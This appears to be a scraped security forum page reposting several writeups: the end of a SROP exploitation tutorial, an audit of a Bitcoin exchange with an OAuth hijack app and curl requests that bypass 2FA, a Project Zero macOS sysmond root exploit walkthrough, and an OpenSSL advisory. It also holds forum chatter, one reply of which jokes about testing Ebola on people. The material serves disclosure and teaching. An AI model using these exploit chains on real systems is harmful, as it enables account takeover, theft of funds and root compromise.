- The rdx register holds the last parameter of execve (zeroed at structure initialization).

Then, the program overflows the saved rip pointer with the address of the mov $0xf,%rax; ret gadget (added artificially to the program through the gadget function). This gadget is followed by the syscall gadget address. So, when the main function returns, these two gadgets are executed, resulting in a sigreturn system call which sets the register values from the previously filled structure. After sigreturn, execve is called, as rip now points to the syscall gadget and rax holds the syscall number of execve. In our example, execve starts a /bin/sh shell.

Code

In this section we provide a vulnerable server (server.c) and use the SROP technique to exploit it (exploit.c).

Vulnerable server

The following program is a simple server that replies back with a welcoming message after receiving some data from a client. The vulnerability is present in the handle_conn function, where we can read more data from the client (4096 bytes) than the destination array (input) can hold (1024 bytes). The program is therefore vulnerable to a classic stack-based overflow.

server.c

Exploit

We know that our payload will be copied to a fixed location in .bss (at 0x6012c0). Our strategy is to copy a shellcode there and then call the mprotect syscall in order to change the protection of the page starting at 0x601000 (which must be a multiple of the page size).

Figure 2: Payload copied in .bss

In this exploit, we overflow our vulnerable buffer as shown by figure 3.
First, we fill our buffer with a nop sled (not necessary) followed by a classic bindshell. This executable payload is prepended with an address pointing to the shellcode in .bss (see figure 2).

exploit.c

Our goal is to change the protection of the memory page containing our shellcode. More precisely, we want to make the following call so that we can execute our shellcode:

mprotect(0x601000, 4096, PROT_READ | PROT_WRITE | PROT_EXEC);

Here is what happens when the vulnerable function returns:

1. The artificial gadget is executed. It sets the rax register to 15.
2. Our artificial gadget is followed by a syscall gadget that results in a sigreturn call.
3. The sigreturn uses our fake uc_mcontext structure to restore the register values. Only the non-shaded parameters in figure 3 are relevant to the exploit. After this call, rip points to the syscall gadget, rax is set to the mprotect syscall number, and rdi, rsi and rdx hold the parameters of the mprotect function. Additionally, rsp points to our payload in .bss.
4. The mprotect syscall is executed.
5. The ret instruction of the syscall gadget is executed. This instruction sets the instruction pointer to the address popped from rsp. This address points to our shellcode (see figure 2).
6. The shellcode is executed.

Figure 3: Stack after overflowing input buffer

Replaying the exploit

The above code has been compiled using gcc (gcc -g -o server server.c) on a Debian Wheezy running on the x86_64 arch. Before reproducing this exploit, you first need to adjust the following addresses:

SYSCALL_GADGET

mtalbi@mtalbi:/home/mtalbi/srop$ cat /proc/self/maps
...
7ffffe5ff000-7ffffe600000 r-xp 00000000 00:00 0     [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0     [vsyscall]
...
gdb$ x/3i 0xffffffffff600000
  0xffffffffff600000:   mov rax,0x60
  0xffffffffff600007:   syscall
  0xffffffffff600009:   ret

RAX_15_GADGET

mtalbi@mtalbi:/home/mtalbi/srop$ gdb server
(gdb) disas gadget
Dump of assembler code for function gadget:
   0x0000000000400acf <+0>:    push %rbp
   0x0000000000400ad0 <+1>:    mov  %rsp,%rbp
   0x0000000000400ad3 <+4>:    mov  $0xf,%rax
   0x0000000000400ada <+11>:   retq
   0x0000000000400adb <+12>:   pop  %rbp
   0x0000000000400adc <+13>:   retq
End of assembler dump.

DATA

(gdb) p &data
$1 = (char [8192]) 0x6012c0

References

[BB14] Erik Bosman and Herbert Bos. We got signal. A return to portable exploits. (Working title, subject to change.) In Security & Privacy (Oakland), San Jose, CA, USA, May 2014. IEEE.

[Sha07] Hovav Shacham. The geometry of innocent flesh on the bone: Return-into-libc without function calls (on the x86). In Proceedings of the 14th ACM Conference on Computer and Communications Security, CCS '07, pages 552–561, New York, NY, USA, 2007. ACM.

Sursa: Playing with signals: An overview on Sigreturn Oriented Programming | This is Security :: by Arkoon-Netasq
-
Hacking a Bitcoin Exchange

Jan 10, 2015 • @homakov

For a while we've been looking for a project on which to conduct a volunteer security audit. Recently we found a perfect fit for us - an open source cryptocurrency exchange, Peatio, powered by Rails. We dedicated 8 hours to finding a way to do the worst you can do to a Bitcoin exchange - steal the hot wallet. The mission was partially accomplished, and we found an interesting chain of critical vulnerabilities.

Step 1. Hijacking the account

Peatio has a "Connect Weibo account" feature built in. According to the OAuth Security Cheatsheet, poorly implemented OAuth is a reliable way to take over an account.

Connecting the attacker's Weibo account to the victim's Peatio account

The omniauth-weibo-oauth2 gem was vulnerable to state fixation. We can set state to an arbitrary value (e.g. 123) and apply the attacker's code along with state=123, which will lead to assigning the attacker's Weibo account to the victim's Peatio account. The exact same issue was in the omniauth-facebook gem and other omniauth-based libraries copy-pasting the same vulnerable code. It's funny that the comment above says "to support omniauth-oauth2's auto csrf protection" but does the opposite and switches it off.

The bug can be exploited with the following Sinatra app, just add YourWeiboCookies:

require 'sinatra'

get '/get_weibo_cb' do
  conn = Faraday.new(:url => 'https://api.weibo.com')
  new_url = conn.get do |r|
    r.url "/oauth2/authorize?client_id=456519107&redirect_uri=https%3A%2F%2Fyunbi.com%2Fauth%2Fweibo%2Fcallback&response_type=code&state=123"
    r.headers['Cookie'] =<<COOKIE
YourWeiboCookies
COOKIE
    r.options.timeout = 4
    r.options.open_timeout = 2
  end.headers["Location"]
  redirect new_url
end

get '/peatio_demo' do
  response.headers['Content-Security-Policy'] = "img-src 'self' https://yunbi.com"
  "<img src='https://yunbi.com/auth/weibo?state=123'><img src='/get_weibo_cb'>"
end

What if the user already has Weibo connected?
The system is not going to connect another Weibo account, but we wanted the exploit to work seamlessly for every possible victim. So we hacked Weibo's OAuth.

First, we found out that Weibo doesn't whitelist redirect_uri, just like GitHub didn't. It's possible to change redirect_uri to another page on the victim domain to leak the code in the Referer header and then use it to log in to the victim's account. However, there was no such page on Peatio to make it leak. No external images, links or anything. The attack surface was tiny. But then we found this in DocumentsController:

if not @DOC
  redirect_to(request.referer || root_path)
  return
end

The following chain of redirects leaks the code by putting it in the # fragment first:

1. attacker_page redirects to weibo.com/authorize?...redirect_uri=http://app/documents/not_existing_doc%23...
2. Weibo doesn't properly parse redirect_uri and redirects the victim to http://app/documents/not_existing_doc#?code=VALID_CODE
3. Peatio cannot find not_existing_doc and sends back a Location header equal to request.referer, which is still attacker_page (the browser retains this header while it gets redirected).
4. The browser preserves the #?code=VALID_CODE fragment and loads attacker_page#?code=VALID_CODE. Now the code can be leaked with JS via the location.hash variable.
5. The code can be used against http://app/auth/weibo/callback to log in to the victim's account.

So, using the two bugs above, we can hijack any Peatio account, and only the last one requires JS.

Step 2: Bypassing 2 Factor Authentication

For users with Google Authenticator activated

There's a gaping hole in SmsAuthsController - two_factor_required! is only called for the show action, but not for update, which is actually responsible for activating SMS 2FA.

before_action :auth_member!
before_action :find_sms_auth
before_action :activated?
before_action :two_factor_required!, only: [:show]

def show
  @phone_number = Phonelib.parse(current_user.phone_number).national
end

def update
  if params[:commit] == 'send_code'
    send_code_phase
  else
    verify_code_phase
  end
end

We can activate a new SMS authenticator by simply sending the following requests straight to the update action:

curl 'http://app/verify/sms_auth' -H 'X-CSRF-Token:ZPwrQuLJ3x7md3wolrCTE6HItxkwOiUNHlekDPRDkwI=' -H 'Cookie:_peatio_session=SID' --data '_method=patch&sms_auth%5Bcountry%5D=DE&sms_auth%5Bphone_number%5D=9123222211&commit=send_code'

curl 'http://app/verify/sms_auth' -H 'X-CSRF-Token:ZPwrQuLJ3x7md3wolrCTE6HItxkwOiUNHlekDPRDkwI=' -H 'Cookie:_peatio_session=SID' --data '_method=patch&sms_auth%5Bcountry%5D=DE&sms_auth%5Bphone_number%5D=9123222211&sms_auth%5Botp%5D=CODE_WE_RECEIVED'

For users with both Authenticator and SMS

Peatio doesn't store failed attempts for OTP, so it's very easy to bruteforce both the App and SMS OTPs; it will take less than 3 days. For more details check our OTP Bruteforce Calculator.

For users with SMS 2FA only

The two_factor_by_type method doesn't use the activated scope, so even inactive 2FA models can be used. Thus we are not going to bruteforce the SMS auth, because the victim would start receiving suspicious SMS. We can still bruteforce Google Authenticator, because it has a seed generated and the verify? method works fine.

def two_factor_by_type
  current_user.two_factors.by_type(params[:id])
end

Furthermore, SMS 2FA has two more issues:

def gen_code
  self.otp_secret = OTP_LENGTH.times.map{ Random.rand(9) + 1 }.join
  self.refreshed_at = Time.now
end

The first issue is that Random.rand is based on a PRNG (Mersenne Twister), which is easily predictable once you have enough subsequently generated numbers. The second issue is that rand(9) + 1 can only generate digits from 1 to 9, so the total number of combinations is 9^6 = 531441, almost half of 1,000,000 and therefore nearly twice as easy to bruteforce as App 2FA.
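The keyspace claims are easy to check numerically. This is a quick back-of-the-envelope sketch (not from the original report); the guess rate is an assumption for illustration, and code rotation is ignored:

```python
# Keyspace of a standard 6-digit OTP vs. Peatio's SMS code, where each
# digit comes from Random.rand(9) + 1, i.e. only the digits 1..9.
totp_space = 10 ** 6
sms_space = 9 ** 6
assert sms_space == 531441        # matches the figure in the post

# Expected guesses to hit a fixed code: half the keyspace on average.
def expected_hours(space, guesses_per_second):
    return (space / 2) / guesses_per_second / 3600

rate = 2  # guesses/second -- assumed, not measured
print("full 6-digit space: %.1f hours at %d/s"
      % (expected_hours(totp_space, rate), rate))   # ~69 h, under 3 days
print("digits 1..9 only:   %.1f hours at %d/s"
      % (expected_hours(sms_space, rate), rate))
```

At a couple of guesses per second, the unthrottled endpoint makes the "less than 3 days" estimate plausible, and the 1..9 restriction nearly halves it again.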
In the worst-case scenario it takes less than 3 days. If the victim has only Google Authenticator, it takes less than 5 seconds to set up a new SMS authenticator.

Step 3: Attacking the admin

Alright, we can hijack the account and bypass 2FA for any user, so we can steal the Bitcoins from anyone who visits our page. Still, we would need to trick a lot of users into clicking our phishy links. Let's focus on just one of them - the admin.

The simplest way to make the admin visit our link is to create a support ticket with something like "What is wrong with my account, can you please check? http://i.will.hack.you/now". Then we hack 2FA to get into the /admin panel.

Unfortunately, this is the worst part. The admin of Peatio can do only a few more things than a regular user. Nothing like "Send all the coins to this bad guy" or "Show API keys of all users".

can :update, Proof
can :manage, Document
can :manage, Member
can :manage, Ticket
can :manage, IdDocument
can :manage, TwoFactor
can :menu, Deposit
can :manage, Deposit
can :manage, ::Deposits::Bank
can :manage, ::Deposits::Satoshi
can :menu, Withdraw
can :manage, ::Withdraws::Bank
can :manage, ::Withdraws::Satoshi

The only thing we found is creating a fiat deposit of, say, 99999999 Chinese Yuan and then accepting it as an admin. Then we can buy all available Bitcoins and altcoins and withdraw them. However, not all Bitcoins are on orders. Doing it in stealth mode for a week can bring better results than closing all the orders in rush mode.

Yunbi assets: 1636 BTC in total and ~350 in the hot wallet.
Our bounty: 1 BTC. It wasn't about the money, though.

The full report in PDF is available upon request.

Sursa: Hacking a Bitcoin Exchange
-
Man, I told you to stop smoking all that junk. Good guy Rockefeller family, wanting to save the planet by thinning out the destructive species: man. We'll give them some volunteers to test Ebola on.
-
Five conspiracy theories that turned out to be true
Nytro replied to Che's topic in Discutii non-IT
Zeitgeist -
Oh dear... Yet another "tutorial" written by Indian spammers. Reality is harsher, guys.
-
Violent Python
A Cookbook for Hackers, Forensic Analysts, Penetration Testers and Security Engineers
TJ. O'Connor

Chapter 1: Introduction
Chapter 2: Penetration Testing with Python
Chapter 3: Forensic Investigations with Python
Chapter 4: Network Traffic Analysis with Python
Chapter 5: Wireless Mayhem with Python
Chapter 6: Web Recon with Python
Chapter 7: Antivirus Evasion with Python

Download: http://t.co/6o6Q9XgnQN
-
[h=1]The little book about OS development[/h] [h=1]Contents[/h] 1 Introduction 1.1 About the Book 1.2 The Reader 1.3 Credits, Thanks and Acknowledgements 1.4 Changes and Corrections 1.5 License [*]2 First Steps 2.1 Tools 2.1.1 Quick Setup 2.1.2 Programming Languages 2.1.3 Host Operating System 2.1.4 Build System 2.1.5 Virtual Machine [*]2.2 Booting 2.2.1 BIOS 2.2.2 The Bootloader 2.2.3 The Operating System [*]2.3 Hello Cafebabe 2.3.1 Compiling the Operating System 2.3.2 Linking the Kernel 2.3.3 Obtaining GRUB 2.3.4 Building an ISO Image 2.3.5 Running Bochs [*]2.4 Further Reading [*]3 Getting to C 3.1 Setting Up a Stack 3.2 Calling C Code From Assembly 3.2.1 Packing Structs [*]3.3 Compiling C Code [*]3.4 Build Tools [*]3.5 Further Reading [*]4 Output 4.1 Interacting with the Hardware 4.2 The Framebuffer 4.2.1 Writing Text 4.2.2 Moving the Cursor 4.2.3 The Driver [*]4.3 The Serial Ports 4.3.1 Configuring the Serial Port 4.3.2 Configuring the Line 4.3.3 Configuring the Buffers 4.3.4 Configuring the Modem 4.3.5 Writing Data to the Serial Port 4.3.6 Configuring Bochs 4.3.7 The Driver [*]4.4 Further Reading [*]5 Segmentation 5.1 Accessing Memory 5.2 The Global Descriptor Table (GDT) 5.3 Loading the GDT 5.4 Further Reading [*]6 Interrupts and Input 6.1 Interrupts Handlers 6.2 Creating an Entry in the IDT 6.3 Handling an Interrupt 6.4 Creating a Generic Interrupt Handler 6.5 Loading the IDT 6.6 Programmable Interrupt Controller (PIC) 6.7 Reading Input from the Keyboard 6.8 Further Reading [*]7 The Road to User Mode 7.1 Loading an External Program 7.1.1 GRUB Modules [*]7.2 Executing a Program 7.2.1 A Very Simple Program 7.2.2 Compiling 7.2.3 Finding the Program in Memory 7.2.4 Jumping to the Code [*]7.3 The Beginning of User Mode [*]8 A Short Introduction to Virtual Memory 8.1 Virtual Memory Through Segmentation? 8.2 Further Reading [*]9 Paging 9.1 Why Paging? 
9.2 Paging in x86 9.2.1 Identity Paging 9.2.2 Enabling Paging 9.2.3 A Few Details [*]9.3 Paging and the Kernel 9.3.1 Reasons to Not Identity Map the Kernel 9.3.2 The Virtual Address for the Kernel 9.3.3 Placing the Kernel at 0xC0000000 9.3.4 Higher-half Linker Script 9.3.5 Entering the Higher Half 9.3.6 Running in the Higher Half [*]9.4 Virtual Memory Through Paging [*]9.5 Further Reading [*]10 Page Frame Allocation 10.1 Managing Available Memory 10.1.1 How Much Memory is There? 10.1.2 Managing Available Memory [*]10.2 How Can We Access a Page Frame? [*]10.3 A Kernel Heap [*]10.4 Further reading [*]11 User Mode 11.1 Segments for User Mode 11.2 Setting Up For User Mode 11.3 Entering User Mode 11.4 Using C for User Mode Programs 11.4.1 A C Library [*]11.5 Further Reading [*]12 File Systems 12.1 Why a File System? 12.2 A Simple Read-Only File System 12.3 Inodes and Writable File Systems 12.4 A Virtual File System 12.5 Further Reading [*]13 System Calls 13.1 Designing System Calls 13.2 Implementing System Calls 13.3 Further Reading [*]14 Multitasking 14.1 Creating New Processes 14.2 Cooperative Scheduling with Yielding 14.3 Preemptive Scheduling with Interrupts 14.3.1 Programmable Interval Timer 14.3.2 Separate Kernel Stacks for Processes 14.3.3 Difficulties with Preemptive Scheduling [*]14.4 Further Reading [*]15 References Book: The little book about OS development
-
Guys, the idea is good. Since you've already started, I suggest you put as much work as you can into the project, because it could turn out really nicely.
-
Recommended.
-
Reported by ianb.. @google.com, Oct 7, 2014 tested on OS X 10.9.5 - uses some hard-coded offsets which will have to be fixed-up for other versions! this poc uses liblorgnette to resolve some private symbols; grab the code from github: git clone https://github.com/rodionovd/liblorgnette.git build this PoC with: clang -o sysmond_exploit_writeup sysmond_exploit_writeup.c liblorgnette/lorgnette.c -framework CoreFoundation sysmond is a daemon running as root. You can interact with sysmond via XPC ("com.apple.sysmond".) sub_100001AAF calls sub_100003120 passing the xpc dictionary received from the attacker. This function allocates a sysmond_request object and fills in fields from the attacker-controlled xpc request dictionary: ;read a uint64 with the key "Type" __text:0000000100003144 mov rax, cs:_SYSMON_XPC_KEY_TYPE_ptr __text:000000010000314B mov rsi, [rax] __text:000000010000314E mov rdi, r14 __text:0000000100003151 call _xpc_dictionary_get_uint64 __text:0000000100003156 mov [rbx+20h], rax ;rbx points to sysmond_request ;read anything with the key "Attributes" __text:000000010000315A mov rax, cs:_SYSMON_XPC_KEY_ATTRIBUTES_ptr __text:0000000100003161 mov rsi, [rax] __text:0000000100003164 mov rdi, r14 __text:0000000100003167 call _xpc_dictionary_get_value __text:000000010000316C mov [rbx+28h], rax ... 
continues parsing more fields The sysmond_request is returned from this function and passed as the first argument to sub_10000337D: __text:000000010000337D sub_10000337D proc near ; CODE XREF: sub_100001AAF+4Bp __text:000000010000337D __text:000000010000337D var_38 = qword ptr -38h __text:000000010000337D var_30 = dword ptr -30h __text:000000010000337D var_2C = dword ptr -2Ch __text:000000010000337D var_28 = qword ptr -28h __text:000000010000337D var_20 = qword ptr -20h __text:000000010000337D var_18 = qword ptr -18h __text:000000010000337D __text:000000010000337D push rbp __text:000000010000337E mov rbp, rsp __text:0000000100003381 push r14 __text:0000000100003383 push rbx __text:0000000100003384 sub rsp, 30h __text:0000000100003388 mov rbx, rdi ; sysmond_request pointer __text:000000010000338B mov rdi, [rbx+20h] ; "Type" uint64 value in the xpc request dictionary __text:000000010000338F mov rsi, [rbx+28h] ; "Attributes" value in the xpc request dictionary __text:0000000100003393 call sub_100003454 this function extracts the Type and Attribute values and passes them to sub_100003454: __text:0000000100003454 sub_100003454 proc near ; CODE XREF: sub_10000337D+16p __text:0000000100003454 ; handler+C0 p __text:0000000100003454 push rbp __text:0000000100003455 mov rbp, rsp __text:0000000100003458 push r15 __text:000000010000345A push r14 __text:000000010000345C push r12 __text:000000010000345E push rbx __text:000000010000345F mov r12, rsi ; this is "Attributes" value __text:0000000100003462 mov r14, rdi ; which was read from the dictionary with xpc_dictionary_get_value __text:0000000100003465 mov rdi, r12 ; meaning it could be any xpc type __text:0000000100003468 call _xpc_data_get_length ; use "Attributes" value as an xpc_data object __text:000000010000346D mov r15, rax __text:0000000100003470 mov rdi, r15 ; size_t __text:0000000100003473 call _malloc __text:0000000100003478 mov rbx, rax __text:000000010000347B mov rdi, r12 __text:000000010000347E mov rsi, rbx 
__text:0000000100003481 xor edx, edx __text:0000000100003483 mov rcx, r15 __text:0000000100003486 call _xpc_data_get_bytes ; use "Attributes" value again interpreted as an xpc_data the xpc_data_get_bytes call is the interesting one: __text:00000000000114BE _xpc_data_get_bytes proc near __text:00000000000114BE push rbp __text:00000000000114BF mov rbp, rsp ... __text:00000000000114D2 mov r14, rsi __text:00000000000114D5 mov r13, rdi __text:00000000000114D8 cmp qword ptr [r13+28h], 0FFFFFFFFFFFFFFFFh __text:00000000000114DD jnz short loc_11515 ... __text:0000000000011515 lea rdi, [r13+28h] ; predicate __text:0000000000011519 lea rdx, __xpc_data_map_once ; function __text:0000000000011520 mov rsi, r13 ; context __text:0000000000011523 call _dispatch_once_f here, if the value at +28h isn't -1 then our xpc object will be passed as the context to __xpc_data_map_once: __text:00000000000028E9 __xpc_data_map_once proc near ; DATA XREF: _xpc_data_get_bytes_ptr+1Fo __text:00000000000028E9 ; __xpc_data_equal+46ao ... 
__text:00000000000028E9 push rbp __text:00000000000028EA mov rbp, rsp __text:00000000000028ED push r14 __text:00000000000028EF push rbx __text:00000000000028F0 mov rbx, rdi ; controlled xpc object __text:00000000000028F3 cmp byte ptr [rbx+48h], 0 ; if the byte at +48h is 0 __text:00000000000028F7 jnz short loc_291E __text:00000000000028F9 mov rdi, [rbx+30h] ; then pass the pointer at +30h __text:00000000000028FD lea rsi, [rbx+38h] __text:0000000000002901 lea rdx, [rbx+40h] __text:0000000000002905 call _dispatch_data_create_map ; to dispatch_data_create_map __text:000000000000290A mov r14, rax __text:000000000000290D mov rdi, [rbx+30h] ; object __text:0000000000002911 call _dispatch_release ; and then to dispatch_release we can return early from dispatch_data_create_map by setting the value at +28h from the pointer passed as the first arg to 0: __text:00000000000012B6 _dispatch_data_create_map proc near ; CODE XREF: __dispatch_data_subrange_map+34p __text:00000000000012B6 ; __dispatch_operation_perform+DEap __text:00000000000012B6 __text:00000000000012B6 push rbp __text:00000000000012B7 mov rbp, rsp __text:00000000000012BA push r15 __text:00000000000012BC push r14 __text:00000000000012BE push r13 __text:00000000000012C0 push r12 __text:00000000000012C2 push rbx __text:00000000000012C3 sub rsp, 38h __text:00000000000012C7 mov [rbp+var_58], rdx __text:00000000000012CB mov r15, rsi __text:00000000000012CE mov r14, rdi __text:00000000000012D1 mov r12, [r14+28h] ; if this is 0 __text:00000000000012D5 test r12, r12 __text:00000000000012D8 jz short loc_131C ; jumps to early return without disturbing anything else we then reach the call to dispatch_release which is passing the pointer at +30h of the xpc object we control (the API believes this is an xpc_data object) this ends up calling _dispatch_objc_release which sends the objective c "release" message to the object. We'll come back to how to get code code execution from that later. 
The crux of the bug is that the value of the "Attributes" key in the request dictionary is never validated to actually be an xpc_data object, yet it gets passed to functions expecting an xpc_data.

In order to exploit this we need to have a value of a type other than xpc_data as the "Attributes" value in the request dictionary - specifically one where the offsets outlined above have suitably controlled values:

+28h  qword  0
+30h  pointer to controlled data
+48h  byte   0

The xpc_uuid type comes the closest to fulfilling these requirements. We completely control the 16 bytes from +28h, so the first two constraints are easily satisfied. Heap spraying is very reliable and fast in XPC; we can easily map a gigabyte of data into sysmond at a predictable address, so we can point the pointer at +30h to that. The xpc_uuid object is only 40h bytes though, so we have no control over the byte at +48h, which must be 0...

OS X uses magazine malloc, which is a heap-based allocator. It has three broad size classes (x<1k = tiny; 1k<x<15k = small; x>15k = large) and within these it will allocate approximately contiguously (using size-based free-lists to speed things up) with no inline metadata, which means there's a reasonable expectation that sequential allocations of similar sizes will be contiguous.

Our xpc_uuid object is allocated when the request dictionary is received, so what's the next thing that is allocated? xpc_dictionaries have 6 hash buckets which store the heads of linked lists, one for each bucket. As the dictionary is being deserialized, first the value of a key is deserialized (allocating, in this case, the xpc_uuid object), then the entry is added to the linked list (allocating a new linked-list entry struct). The structure of a linked-list entry is approximately:

struct ll {
  struct ll* forward;
  struct ll* backward;
  xpc_object_t* object;
  uint64_t flags;
  char key[0];
}

This is a variable-size struct - the key is allocated inline.
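The offset arithmetic behind this layout can be checked with a tiny sketch, using the sizes stated above (a 0x40-byte xpc_uuid immediately followed on the heap by the struct ll):

```python
# If malloc places the linked-list entry directly after the 0x40-byte
# xpc_uuid, the fields of struct ll land at these offsets measured from
# the start of the uuid object.
UUID_SIZE = 0x40                  # size of an xpc_uuid object (per the post)
ll_offsets = {"forward": 0x00, "backward": 0x08, "object": 0x10, "flags": 0x18}

# The byte the fake "xpc_data" code checks is at uuid+0x48, which is
# exactly the low byte of the adjacent entry's `backward` pointer.
off_backward = UUID_SIZE + ll_offsets["backward"]
assert off_backward == 0x48

# That low byte is 0 whenever the previous list entry is at least
# 256-byte aligned; magazine malloc "small" chunks are 512-byte aligned.
assert 512 % 256 == 0
```

So the single uncontrolled constraint (+48h == 0) reduces to a heap-grooming requirement on the size of the previous linked-list entry.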
If the xpc_uuid is immediately followed in memory by its linked-list entry, then the value at +48h will be the least-significant byte of the backward linked-list pointer. Our only requirement is that this byte be 0, which is easily achieved by ensuring that the previous linked-list entry struct in the list (which this linked-list entry points to) was allocated with an alignment of at least 256 bytes. The magazine malloc "small" size class heap chunks all have an alignment of 512 bytes, meaning we just need the linked-list entry prior to the xpc_uuid to be between 1k and 15k in size. In order for the key to end up in the right linked list when it's deserialized, we also need to make sure that the long key hashes to the same value as "Attributes" - since there are only 6 possible hash values this is trivial.

Finally, we can add another xpc_data object to the request dictionary with a gigabyte of heap spray as the value - this will be mapped into sysmond at a suitably predictable address, meaning we can set the high 8 bytes of the uuid value to point to this.

At this point we control a pointer to an Objective-C object and the code will call objc_msgSend to "send a message" to our controlled object, which is the Objective-C paradigm for calling methods. Let's look at the implementation of this to see how we can turn that into instruction pointer control:

__text:000000000000117F __dispatch_objc_release proc near       ; CODE XREF: _dispatch_release:loc_117Aj
__text:000000000000117F                                         ; _dispatch_data_create_subrange+183_p ...
__text:000000000000117F                 mov     rax, rdi
__text:0000000000001182                 cmp     cs:__os_object_have_gc, 0
__text:0000000000001189                 jnz     short loc_119E
__text:000000000000118B                 mov     rcx, cs:msgRef_release__objc_msgSend_fixup
__text:0000000000001192                 lea     rsi, msgRef_release__objc_msgSend_fixup
__text:0000000000001199                 mov     rdi, rax
__text:000000000000119C                 jmp     rcx

rdi points to our heap-sprayed fake Objective-C object.
This code sets rsi to point to the msgRef_release__objc_msgSend_fixup structure, then jumps to the value at that address, which is objc_msgSend_fixedup. msgRef_release__objc_msgSend_fixup is in the __objc_msgrefs section of the data segment, and in lldb we can see that at runtime it has the following contents:

  { /usr/lib/libobjc.A.dylib`objc_msgSend_fixedup, "release" }

and the implementation of objc_msgSend_fixedup is:

(lldb) disassemble --name objc_msgSend_fixedup
libobjc.A.dylib`objc_msgSend_fixedup:
  0x7fff91d5d1c4:  mov    RSI, QWORD PTR [RSI + 8]
  0x7fff91d5d1c8:  jmpq   0x7fff91d5d080             ; objc_msgSend

which just calls through to objc_msgSend, passing the address of the "release" string as the second argument:

(lldb) disassemble --name objc_msgSend
libobjc.A.dylib`objc_msgSend:
  0x7fff91d5d080:  test   RDI, RDI
  0x7fff91d5d083:  je     0x7fff91d5d0f8
  0x7fff91d5d086:  test   DIL, 1
  0x7fff91d5d08a:  jne    0x7fff91d5d10f
  0x7fff91d5d091:  mov    R11, QWORD PTR [RDI]       ; rdi points to controlled fake objective-c object - read pointer to objective-c class
  0x7fff91d5d094:  mov    R10, RSI                   ; copy selector (pointer to string of method to call) to r10
  0x7fff91d5d097:  and    R10D, DWORD PTR [R11 + 24] ; mask off the upper bits of the selector pointer according to the mask at fake_class+18h
  0x7fff91d5d09b:  shl    R10, 4
  0x7fff91d5d09f:  add    R10, QWORD PTR [R11 + 16]  ; use that masked value as an index into a cache array pointed to by fake_class+10h
  0x7fff91d5d0a3:  cmp    RSI, QWORD PTR [R10]       ; does the cache entry selector match the selector passed as the second arg?
  0x7fff91d5d0a6:  jne    0x7fff91d5d0ac
  0x7fff91d5d0a8:  jmp    QWORD PTR [R10 + 8]        ; if so, call the cached function implementation address

Objective-C classes cache the addresses of the selector strings, not the contents of the strings, so in order to exploit this we need to be able to find the address of the "release" selector passed by _dispatch_objc_release so we can construct a fake selector cache.
All these libraries are loaded at the same address in all processes, so we can just find the selector address in this process and it'll be valid for sysmond. Having done this, we get instruction pointer control.

At this point rax and rdi point to the heap spray, so this PoC uses a pivot gadget in CoreFoundation to move the stack into the heap spray and ROPs to a system() call with a controlled string (the PoC does "touch /tmp/hello_root" as root).

Attachment: sysmond_exploit_writeup.c (19.6 KB)

Sursa: https://code.google.com/p/google-security-research/issues/detail?id=121
OpenSSL Security Advisory [08 Jan 2015]
=======================================

DTLS segmentation fault in dtls1_get_record (CVE-2014-3571)
===========================================================

Severity: Moderate

A carefully crafted DTLS message can cause a segmentation fault in OpenSSL
due to a NULL pointer dereference. This could lead to a Denial Of Service
attack.

This issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8.

OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1k.
OpenSSL 1.0.0 DTLS users should upgrade to 1.0.0p.
OpenSSL 0.9.8 DTLS users should upgrade to 0.9.8zd.

This issue was reported to OpenSSL on 22nd October 2014 by Markus Stenberg
of Cisco Systems, Inc. The fix was developed by Stephen Henson of the
OpenSSL core team.

DTLS memory leak in dtls1_buffer_record (CVE-2015-0206)
=======================================================

Severity: Moderate

A memory leak can occur in the dtls1_buffer_record function under certain
conditions. In particular this could occur if an attacker sent repeated DTLS
records with the same sequence number but for the next epoch. The memory
leak could be exploited by an attacker in a Denial of Service attack through
memory exhaustion.

This issue affects OpenSSL versions: 1.0.1 and 1.0.0.

OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1k.
OpenSSL 1.0.0 DTLS users should upgrade to 1.0.0p.

This issue was reported to OpenSSL on 7th January 2015 by Chris Mueller who
also provided an initial patch. Further analysis was performed by Matt
Caswell of the OpenSSL development team, who also developed the final patch.

no-ssl3 configuration sets method to NULL (CVE-2014-3569)
=========================================================

Severity: Low

When openssl is built with the no-ssl3 option and a SSL v3 ClientHello is
received the ssl method would be set to NULL which could later result in a
NULL pointer dereference.

This issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8.
OpenSSL 1.0.1 users should upgrade to 1.0.1k.
OpenSSL 1.0.0 users should upgrade to 1.0.0p.
OpenSSL 0.9.8 users should upgrade to 0.9.8zd.

This issue was reported to OpenSSL on 17th October 2014 by Frank Schmirler.
The fix was developed by Kurt Roeckx.

ECDHE silently downgrades to ECDH [Client] (CVE-2014-3572)
==========================================================

Severity: Low

An OpenSSL client will accept a handshake using an ephemeral ECDH
ciphersuite using an ECDSA certificate if the server key exchange message is
omitted. This effectively removes forward secrecy from the ciphersuite.

This issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8.

OpenSSL 1.0.1 users should upgrade to 1.0.1k.
OpenSSL 1.0.0 users should upgrade to 1.0.0p.
OpenSSL 0.9.8 users should upgrade to 0.9.8zd.

This issue was reported to OpenSSL on 22nd October 2014 by Karthikeyan
Bhargavan of the PROSECCO team at INRIA. The fix was developed by Stephen
Henson of the OpenSSL core team.

RSA silently downgrades to EXPORT_RSA [Client] (CVE-2015-0204)
==============================================================

Severity: Low

An OpenSSL client will accept the use of an RSA temporary key in a
non-export RSA key exchange ciphersuite. A server could present a weak
temporary key and downgrade the security of the session.

This issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8.

OpenSSL 1.0.1 users should upgrade to 1.0.1k.
OpenSSL 1.0.0 users should upgrade to 1.0.0p.
OpenSSL 0.9.8 users should upgrade to 0.9.8zd.

This issue was reported to OpenSSL on 22nd October 2014 by Karthikeyan
Bhargavan of the PROSECCO team at INRIA. The fix was developed by Stephen
Henson of the OpenSSL core team.

DH client certificates accepted without verification [Server] (CVE-2015-0205)
=============================================================================

Severity: Low

An OpenSSL server will accept a DH certificate for client authentication
without the certificate verify message.
This effectively allows a client to authenticate without the use of a
private key.

This only affects servers which trust a client certificate authority which
issues certificates containing DH keys: these are extremely rare and hardly
ever encountered.

This issue affects OpenSSL versions: 1.0.1 and 1.0.0.

OpenSSL 1.0.1 users should upgrade to 1.0.1k.
OpenSSL 1.0.0 users should upgrade to 1.0.0p.

This issue was reported to OpenSSL on 22nd October 2014 by Karthikeyan
